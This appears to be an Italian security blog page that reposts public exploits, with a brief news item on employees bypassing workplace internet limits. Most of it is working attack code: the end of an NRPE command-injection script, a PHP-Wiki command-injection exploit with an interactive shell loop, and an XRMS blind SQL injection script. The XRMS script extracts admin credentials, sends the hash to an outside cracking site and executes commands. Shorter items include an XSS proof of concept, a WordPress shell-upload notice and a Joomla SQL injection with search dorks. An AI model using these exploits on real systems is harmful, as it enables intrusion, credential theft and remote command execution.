                        m_oNRPE.run_query(m_sQuery)
                except socket.error:
                        print('[!] Connection Error!')
                        sys.exit(1)
                except OpenSSL.SSL.ZeroReturnError:
                        print('[!] Not Vulnerable')
                        print('[!] Option dont_blame_nrpe disabled or service fixed')
                        sys.exit(1)
 
                if m_oNRPE.sData[-11:] == "not defined":
                        print('[-] Checking for NRPE command '+LinesPluginList+':\t\t\tnot found')
                else:
                        print('[+] Checking for NRPE command '+LinesPluginList+':\t\t\tVULNERABLE!')
                        print('[+]')
                        print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')
                        print('[+]')
                        print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')
                        print('[+]')
                        print(m_oNRPE.sData)
                        sys.exit(0)
    elif m_sQuery:
        # Custom-command mode: a single query using the -c command name.
        print('[+] Custom command Mode....')
        print('[+]')
        print('[+] Connecting......')
 
        # argument string = --cmd plus any positional leftovers
        m_CommandQuery = ""
        m_CommandQuery += ' ' + m_oOptions.cmd
        if m_lArgs:
                m_CommandQuery += ' ' + ' '.join(m_lArgs)
 
        # query = <command name>!<evilchar><argument string> #  (evilchar: see top of file)
        m_sQuery = m_sQuery+'!'+str(evilchar)+str(m_CommandQuery)+' #'
 
        m_oNRPE = NrpeClient(m_oOptions.host, m_oOptions.port, m_oOptions.ssl,
                m_oOptions.timeout)
        try:
               m_oNRPE.run_query(m_sQuery)
        except KeyboardInterrupt:
                # raised by alarm_handler when the SIGALRM timeout fires
                print("[!] CHECK_NRPE: Socket timeout after %d seconds." % m_nTimeout)
                sys.exit(1)
        except socket.error:
                print('[!] Connection Error!')
                sys.exit(1)
        except OpenSSL.SSL.ZeroReturnError:
                print('[!] Not Vulnerable')
                print('[!] Option dont_blame_nrpe disabled or service fixed')
                sys.exit(1)
 
        if m_oNRPE.sData[-11:] == "not defined":
                print('[-] Checking for NRPE command '+m_oOptions.command+': not found...try other NRPE command')
        else:
                print('[+] Checking for NRPE command '+m_oOptions.command+': VULNERABLE!')
                print('[+]')
                print('[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)')
                print('[+]')
                print('[+] Please ignore NRPE plugin command messages (Usage or Errors)')
                print('[+]')
                print(m_oNRPE.sData)
                sys.exit(0)


29Aug/140

Un italiano su tre aggira le restrizioni Internet sul lavoro

Una ricerca OnePoll rileva che i numerosi dipendenti italiani, nonostante le regole aziendali, accedono dal lavoro a Facebook, utilizzano le app e la messaggistica.

Per i CIO non una bella notizia. Secondo i dati di una ricerca OnePoll per Samsung, infatti, un italiano su tre (32 per cento) aggira le restrizioni d’accesso a Internet (Facebook, app e messaggistica) imposte dalla propria azienda sul luogo di lavoro.
E se guardiamo la fascia di età fra i 18 e i 34 anni il dato sale al 49 per cento.

Se da una parte questo significa un miglioramento delle competenze informatiche, dall’altra è un dato che dovrebbe preoccupare i responsabili dei sistemi informativi aziendali.
Toccherà a loro riparare gli eventuali danni dell’aggiramento delle policy. Il 26 per cento tende a ignorare o ad aggirare le restrizioni usando i dispositivi personali per Twitter, il 29 per cento per servizi di video streaming, il 34 per cento per applicazioni d’archiviazione sul cloud e il 38 per cento per le app mobile.

L’indagine di Samsung che ha coinvolto 4.500 persone in sette Paesi europei (Italia, Gran Bretagna, Germania, Francia, Spagna, Belgio e Olanda) rivela che nonostante in Europa l’accesso a Facebook sia limitato o addirittura vietato al 40 per cento dei dipendenti, sono in molti a ignorare o aggirare le regole: il 34 per cento in Germania, il 32 per cento in Spagna, il 31 per cento in Belgio e Olanda.

I più indisciplinati sono gli inglesi (41 per cento), mentre i francesi (20 per cento) si distinguono per il rispetto delle norme aziendali. Il settore di mercato europeo in cui limiti e divieti sono più frequenti è l’alberghiero. Il 47 per cento delle aziende ha delle regole in materia, ma il 38 per cento del personale le infrange, un dato inferiore solo al 46 per cento degli indisciplinati che si trovano nel settore immobiliare.

“Dal punto di vista della sicurezza, è comprensibile che i datori di lavoro vogliano controllare l’uso della tecnologia da parte dei propri dipendenti”, commenta Dimitrios Tsivrikos, Consumer and Business Psychologist allo University College London. “Se però questo si traduce nell’ignorare le esigenze del professionista moderno, le aziende potrebbero andare incontro a un calo di produttività e di coinvolgimento”. (L. F.)

Fonte: http://www.cwi.it/un-italiano-su-tre-aggira-le-restrizioni-internet-sul-lavoro-21217

28Aug/140

PHP-Wiki Command Injection

###############################################################
#    ____                    __                  _ __   _ 
#   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)
#  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / 
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  
#/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   
#             /_/ /_/         /_/                     
# Diskovered in Nov/Dec 2011
###############################################################
 
import urllib
import urllib2
import sys
def banner():
	"""Print the ASCII-art banner (Python 2 print statements; tab-indented file)."""
	print "	    ____                    __                  _ __   _ "
	print "	   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)"
	print "	  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
	print "	 / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  "
	print "	/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   "
	print "	             /_/ /_/         /_/                     \n"
 
 
def usage():
	"""Print the banner and a one-line usage example; the caller decides whether to exit."""
	banner()
	print "	[+] Usage example"
	print "	[-] python " + sys.argv[0] + " http://path.to/wiki"
 
# The wiki base URL is the single required positional argument; quit() raises
# SystemExit here rather than returning.
if len(sys.argv)< 2:
	usage()
	quit()
 
# Base URL of the target wiki; commandexec() appends '/index.php/HeIp' to it
# directly, so a trailing slash would double up.
domain = sys.argv[1]
def commandexec(cmd):
	"""POST an edit *preview* of page 'HeIp' and return the text the server
	echoes back between the '123:::' and ':::123' markers.

	The submitted content is a Ploticus plugin block whose device argument
	carries `cmd`; the echo markers are what lets the relevant slice of the
	HTML response be cut out. Uses the module-level `domain`.
	Detection note: an edit-preview POST whose content begins with
	'<<Ploticus device="' and contains shell metacharacters is the request
	shape an access-log or WAF rule would key on.
	"""
	data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
	cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
	cmd2 = urllib2.urlopen(cmd1)
	output = cmd2.read()
	# If either marker is missing find() returns -1 and the slice is meaningless.
	firstloc = output.find("123:::\n") + len("123:::\n")
	secondloc = output.find("\n:::123")
	return output[firstloc:secondloc]
 
 
# Interactive loop: two fixed probes, then read commands until 'quit'.
banner()
print commandexec('uname -a')
print commandexec('id')
# `quit` is the interpreter's builtin until it is rebound to 1 below, so the
# comparison is true on the first pass; the assignment is what ends the loop.
while(quit != 1):
	cmd = raw_input('Run a command: ')
	if cmd == 'quit':
		print "[-] Hope you had fun :)"
		quit = 1
	if cmd != 'quit':
		print commandexec(cmd)


28Aug/140

XRMS Blind SQL Injection / Command Execution

#######################
# XRMS Blind SQLi via $_SESSION poisoning, then command exec
#########################
 
import urllib
import urllib2
import time
import sys
 
# Candidate characters for the blind guessing loops and their ASCII codes,
# index-aligned: usercharac[f] is the character whose code is userascii[f].
usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
def banner():
  """Print the ASCII-art banner (Python 2 print statement)."""
  print """      ____                                      
     / __/_  ______ _  _  ___________ ___  _____
    / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
   / __/ /_/ / /_/ / _>  </ /  / / / / / (__  ) 
  /_/  \__,_/\__, (_)_/|_/_/  /_/ /_/ /_/____/  
               /_/                              
  [+] fuq th3 w0rld, fuq ur m0m!\n"""
 
def usage():
  """Print a short description and invocation example, then quit() (SystemExit)."""
  print "  [+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
  print "  [+] Example:"
  print "  [+] python " + sys.argv[0] + " domain.to/xrms"
  quit()
 
def sendhashaway(hash):
  """Look the MD5 hash up on the third-party site icrackhash.com and return
  the plaintext it reports.

  The hash is sent out in an HTTP GET (in both the URL and the Referer), so
  it is disclosed to that site and to anyone observing egress traffic.
  getpositions() is not visible in this file; presumably it extracts the
  text between the two markers given — confirm. The parameter name shadows
  the builtin hash().
  """
  print " [+] Sending hash to icrackhash.com to be cracked."
  data = None
  headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
  url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
  gh = urllib2.Request(url,data,headers)
  gh2 = urllib2.urlopen(gh)
  output = gh2.read()
  plaintext = getpositions(output,'<td><small><strong>','</strong>')
  print " [-] Plaintext of hash: " +plaintext + "\n"
  return plaintext
 
def username(length):
  """Recover `length` characters of the username column by time-based blind
  SQL injection and return them as a list of single-character strings.

  For each position, every candidate in usercharac is tried; the injected
  IF(...BENCHMARK...) stalls the server when the guess matches, and a
  fingeruser.php HEAD request that takes more than 1 s is taken as a hit.
  The session id handed out by new-form.php is replayed as the XRMS cookie,
  which is how the poisoned $_SESSION value reaches the query. Uses the
  module-level `domain`. The inner `while` only ends once a character is
  accepted, so a position with no match never terminates.
  """
  length = length + 1
  duser = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        # Redefined on every iteration: a redirect handler that hands 3xx
        # responses back instead of following them, and a Request forced to POST.
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        # Pull the PHPSESSID value out of the response headers and re-label it as the XRMS cookie.
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        # Timing oracle: wall-clock the HEAD request; errors are ignored on purpose.
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          duser.append(usercharac[f])
          found = 1
  return duser
 
def getusernamelength():
  """Find the length of the username by time-based blind SQL injection.

  Tries lengths 1, 2, 3, ... in turn; the injected IF(LENGTH(...)...BENCHMARK)
  stalls the server on the right value and a fingeruser.php HEAD request
  over 1 s is taken as the answer, which is returned as an int. Same
  session-replay mechanism as username(); uses the module-level `domain`.
  Never returns if no length ever produces a delay.
  """
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
  payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
  while (found != 1): 
    # Redefined each pass: redirect handler that returns 3xx responses
    # as-is, and a Request forced to POST.
    class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
      def http_error_302(self, req, fp, code, msg, headers):
        infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
        infourl.status = code
        infourl.code = code
        return infourl
      http_error_300 = http_error_302    
    class HeadRequest(urllib2.Request):
      def get_method(self):
        return "POST"
    payload = payload1 + str(i) + payload2
    data = urllib.urlencode([('user_id',payload)])
    url = 'http://'+domain+'/plugins/webform/new-form.php'
    opener = urllib2.build_opener(LeHTTPRedirectHandler)
    req = HeadRequest(url,data)
    prepare = opener.open(req)
    # PHPSESSID from the response headers, re-labelled as the XRMS cookie.
    cookie1 = prepare.info()
    cookie2pos1 = str(cookie1).find('PHPSESSID')
    cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
    line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
    line = 'XRMS' + line[9:]
    url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
    headers = { 'Cookie' : line }
    data = None
    # Timing oracle on the HEAD request; errors are ignored on purpose.
    start = time.time()
    get = urllib2.Request(url,data,headers)
    get.get_method = lambda: 'HEAD'
    try:
      execute = urllib2.urlopen(get)
    except:
      pass
    elapsed = (time.time() - start)
    if(elapsed > 1):
      print "  Length found at position: " + str(i)
      found = 1
      length = i
      return length
    i = i + 1
 
def password(length):
  """Recover `length` characters of the password column (called with 32,
  the width of an MD5 hex digest) by the same time-based blind SQL injection
  as username(); returns the characters as a list.

  Per position, each candidate in usercharac is tried; a BENCHMARK-induced
  delay (> 1 s on the fingeruser.php HEAD request) marks the match. Uses the
  module-level `domain`. As in username(), a position with no matching
  candidate loops forever.
  """
  length = length + 1
  dpassword = []
  #1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
  found = 0
  i = 1
  payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
  payload2 = ",1)=CHAR("
  payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
        for i in range(1,length):
    found = 0
    while(found != 1):
      for f in range(0,len(userascii)):
        # Redefined on every iteration: a redirect handler that hands 3xx
        # responses back instead of following them, and a Request forced to POST.
        class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
          def http_error_302(self, req, fp, code, msg, headers):
            infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
            infourl.status = code
            infourl.code = code
            return infourl
          http_error_300 = http_error_302    
        class HeadRequest(urllib2.Request):
          def get_method(self):
            return "POST"
        payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
        data = urllib.urlencode([('user_id',payload)])
        url = 'http://'+domain+'/plugins/webform/new-form.php'
        opener = urllib2.build_opener(LeHTTPRedirectHandler)
        req = HeadRequest(url,data)
        prepare = opener.open(req)
        # PHPSESSID from the response headers, re-labelled as the XRMS cookie.
        cookie1 = prepare.info()
        cookie2pos1 = str(cookie1).find('PHPSESSID')
        cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
        line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
        line = 'XRMS' + line[9:]
        url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
        headers = { 'Cookie' : line }
        data = None
        # Timing oracle on the HEAD request; errors are ignored on purpose.
        start = time.time()
        get = urllib2.Request(url,data,headers)
        get.get_method = lambda: 'HEAD'
        try:
          execute = urllib2.urlopen(get)
        except:
          pass
        elapsed = (time.time() - start)
        if(elapsed > 1):
          print "  Character found. Character is: " + usercharac[f]
          dpassword.append(usercharac[f])
          found = 1
  return dpassword
 
def login(domain,user,password):
  """POST the credentials to login-2.php under a fixed XRMS session cookie.

  Prints "Logged In" when the response body contains 'PEAR.php'; that string
  is being used as the success indicator — what it corresponds to in the
  application is not visible here. Returns nothing; the fixed cookie value
  is the same one commandexec() uses, so the session is shared by name.
  """
  cookie = "XRMS=iseeurgettinown4d"
  url = 'http://'+domain+'/login-2.php'
  headers = { 'Cookie' : cookie }
  data = urllib.urlencode([('username',user),('password',password)])
  a1 = urllib2.Request(url,data,headers)
  a2 = urllib2.urlopen(a1)
  output = a2.read()
  if output.find('PEAR.php') > 0:
    print "  [+] Logged In"
 
def commandexec(domain,command):
  """Send `command` to fingeruser.php on `domain` and return the text between the markers.

  The command is wrapped as "; echo '0x41';<command>;echo '14x0';" and used as
  the key of the query string appended after `username=`; the request carries
  the same hard-coded XRMS cookie that login() uses. The response body is
  sliced between the '0x41' and '14x0' markers (4 bytes in from each) and that
  slice is returned.
  """
  cookie = "XRMS=iseeurgettinown4d"
  # urlencode() stringifies the None value, so the encoded fragment ends in "=None".
  cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
  headers = { 'Cookie' : cookie }
  # No body: the request is sent as a GET.
  data = None
  url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
  b1 = urllib2.Request(url,data,headers)
  # NOTE(review): `a1` is not assigned anywhere in this function (it is a local
  # of login()), so this line raises NameError as written.
  b2 = urllib2.urlopen(a1)
  output = b2.read()
  # If a marker is absent, find() returns -1 and the slice bounds become 3 / -5.
  first = output.find('0x41') + 4
  last = output.find('14x0') - 4
  return output[first:last]
 
# Script entry point: print the banner, check the argument, then run the
# enumeration / login flow and drop into an interactive command loop.
# banner(), usage(), getusernamelength(), username(), password() and
# sendhashaway() are defined elsewhere in this file (not in view here).
banner()
if len(sys.argv) < 2:
  usage()  # presumably exits; otherwise sys.argv[1] below raises IndexError -- TODO confirm
domain = sys.argv[1]  # host only; login() and commandexec() prepend 'http://'
print "  [+] Grabbing username length"
length = getusernamelength()
print "  [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)  # username() appears to return a list of characters
print "  [+] Grabbing password hash"
tmppass =  password(32)  # 32 characters; presumably an MD5 hex digest -- TODO confirm
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print "  [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)  # opaque helper; semantics not visible here
login(domain,adminusr,plain)
# NOTE(review): `quit` is not assigned in the visible code before this loop; it
# relies on an outer definition (the site-provided builtin `quit` is != 1).
while(quit != 1):
  cmd = raw_input('  [+] Run a command: ')
  if cmd == 'quit':
    print "  [-] Hope you had fun :)"
    quit = 1
  # The two `if` tests are mutually exclusive (an else would do the same).
  if cmd != 'quit':
    print "  [+] "+ commandexec(domain,cmd)



F5 BIG-IP 11.5.1 Cross Site Scripting

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
SEC Consult Vulnerability Lab Security Advisory < 20140828-0 >
=======================================================================
              title: Reflected Cross-Site Scripting
            product: F5 BIG-IP
 vulnerable version: <= 11.5.1
      fixed version: > 11.6.0
             impact: Medium
         CVE number: CVE-2014-4023
           homepage: https://f5.com/
              found: 2014-07-07
                 by: Stefan Viehböck
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================
 
Vendor/product description:
- -----------------------------
"The BIG-IP product suite is a system of application delivery services that
work together on the same best-in-class hardware platform or software virtual
instance.  From load balancing and service offloading to acceleration and
security, the BIG-IP system delivers agility—and ensures your applications
are fast, secure, and available."
 
URL: https://f5.com/products/big-ip
 
 
Vulnerability overview/description:
- -----------------------------------
BIG-IP suffers from a reflected Cross-Site Scripting vulnerability,
which allows an attacker to steal other users' sessions, to impersonate other
users and to gain unauthorized access to the admin interface.
 
 
Proof of concept:
- -----------------
The following HTTP request triggers the vulnerability:
 
POST /tmui/dashboard/echo.jsp HTTP/1.1
Host: BIGIP
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 29
 
<script>alert('xss')</script>
 
The server does not properly encode user-supplied input and reflects it back
to the user, resulting in Cross-Site Scripting.
 
 
Vulnerable / tested versions:
- -----------------------------
More information can be found at:
https://support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html
 
 
Vendor contact timeline:
- ------------------------
2014-07-08: Sending advisory and proof of concept exploit via encrypted
            channel.
2014-07-09: Vendor confirms receipt of advisory. States that fix will be
            released in the "next 6 weeks or so"
2014-07-24: Vendor provides CVE: CVE-2014-4023
2014-08-26: Vendor releases fixed version.
2014-08-28: SEC Consult releases a coordinated security advisory.
 
 
Solution:
- ---------
Update to the newest version.
 
More information can be found at:
https://support.f5.com/kb/en-us/solutions/public/15000/500/sol15532.html
 
 
Workaround:
- -----------
No workaround available.
 
 
Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
 
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius
 
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15
 
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
 
Interested in working with the experts of SEC Consult?
Write to career@sec-consult.com
 
EOF Stefan Viehböck / @2014



Nmap Port Scanner 6.47

nmap port scanner matrix

Nmap is a utility for port scanning large networks, although it works fine for single hosts too. Sometimes you need speed; other times you may need stealth.

In some cases, bypassing firewalls may be required. Not to mention the fact that you may want to scan different protocols (UDP, TCP, ICMP, etc.).

Nmap supports Vanilla TCP connect() scanning, TCP SYN (half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp proxy (bounce attack) scanning, SYN/FIN scanning using IP fragments (bypasses some packet filters), TCP ACK and Window scanning, UDP raw ICMP port unreachable scanning, ICMP scanning (ping-sweep), TCP Ping scanning, Direct (non portmapper) RPC scanning, Remote OS Identification by TCP/IP Fingerprinting, and Reverse-ident scanning.

Nmap also supports a number of performance and reliability features such as dynamic delay time calculations, packet timeout and retransmission, parallel port scanning, detection of down hosts via parallel pings.

Fonte: http://packetstormsecurity.com/files/128000/Nmap-Port-Scanner-6.47.html



WordPress WPtouch Mobile 3.4.5 Shell Upload

Wordpress WPtouch Mobile Plugin File Upload Vulnerability
 
=================================
 
 
====================
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/    \/   --X--
 Don Tukulesto      /     /  /__/  /__/  /  /  /__/  /__/| 
                   /  /  /  /  /  /  /   __/__   /__   / :
                  /__/__/\____/\____/\____/  /  /  /  /
                   www.indonesiancoder.com\____/\____/                                    
                       73 78 68 79 78 69 83 73 65 78  67 79 68 69 82
 
 
 
Found by  : k4L0ng666 (k4L0ng666@indonesiancoder.com)
 
Submitted by  : Don Tukulesto (root@indonesiancoder.com)
 
Homepage  : http://indonesiancoder.com
 
Published  : August 26, 2014
 
Tested On  : OS X 10.9.4
 
=================================
 
 
====================
 
==================
| Software Info |==================
 
 
 
[>] Download      : http://downloads.wordpress.org/plugin/wptouch.3.4.5.zip
 
[>] Software      : WPtouch Mobile Plugin - Wordpress Plugin
 
[>] Plugin Version  : 3.4.5
 
[>] Vulnerability  : File upload
 
 
 
I. Proof of Concept
 
=================================
 
 
====================
Any .php file can be uploaded through the uploader; the uploaded file can then be found under /wp-content/wptouch-data/
 
 
 
See Image below
 
II. Vendor patch
 
=================================
 
 
====================
The vendor currently provides no patch or upgrade,
because this is the latest version. \m/
 
 
=================================
 
 
====================
 
WE ARE ONE UNITY, WE ARE A CODER FAMILY AND WE ARE INDONESIAN CODER
 
 
 
[>] Malang Cyber Crew ~ Magelang Cyber ~ Exploit-ID ~ Kill-9 Crew ~ Jatimcom
 
 
 
 
“People should not be afraid of their governments. Governments should be afraid of their people.” -V
 
 
“Knowledge, like air, is vital to life. Like air, no one should be denied it.” 
 
~(^_^)~
=================================



Joomla Spider 2.8.3 SQL Injection

######################
# Exploit Title : Joomla Spider video player 2.8.3 SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/22321
 
# Dork Google: inurl:/component/spidervideoplayer
               inurl:option=com_spidervideoplayer    
 
# Date : 2014-08-26
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
 
 
######################
 
# PoC Exploit:
 
http://localhost/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
 
The "theme" parameter is not sanitized.
 
#####################
 
Discovered By : Claudio Viviani
                http://www.homelab.it
 
                info@homelab.it
                homelabit@protonmail.ch
 
                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
 
#####################
